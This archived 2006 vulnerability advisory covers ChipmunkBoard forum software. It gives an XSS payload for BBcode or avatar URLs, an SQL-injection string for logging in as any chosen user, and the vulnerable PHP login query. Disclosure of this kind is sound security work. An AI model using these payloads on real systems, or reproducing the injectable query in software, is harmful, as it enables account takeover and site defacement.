Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: etc :: b06-2040.htm

ChipmunkBoard Multiple Attack vectors



ChipmunkBoard Multiple Attack vectors
ChipmunkBoard Multiple Attack vectors



ChipmunkBoard Multiple Attack vectors=0D
=0D
Discovered by: Nomenumbra=0D
Date: 6/4/2006=0D
impact:high (privilege escalation,possible defacement)=0D
=0D
It is possible to insert the following javascript in the BBcode or supply it as your avatar url:=0D
=0D
javascript:alert(%27xss%27);=0D
=0D
Also ChipmunkBoard is prone to SQL-injection, provided magic_quotes is turned off.=0D
=0D
SQL injection is as follows (quite odd), replace whateveruser with the username you want to log in as:=0D
=0D
a' or ('1' = '1' AND username = 'whateveruser') or  '2' = '2=0D
=0D
The vulnerable code lies in:=0D
=0D
$query = "select * from b_users where username='$username' and password='$password' and validated='1'"; =0D
=0D
Nomenumbra/[0x4F4C]=0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH